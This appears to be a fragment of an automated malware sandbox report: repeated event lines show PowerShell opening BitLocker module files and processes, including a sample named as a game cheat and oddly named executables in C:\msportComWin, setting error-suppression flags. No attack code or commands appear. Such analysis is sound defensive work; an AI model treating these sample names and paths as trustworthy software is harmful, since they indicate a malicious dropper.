                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\msportComWin\jnowHpJlZlXal.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
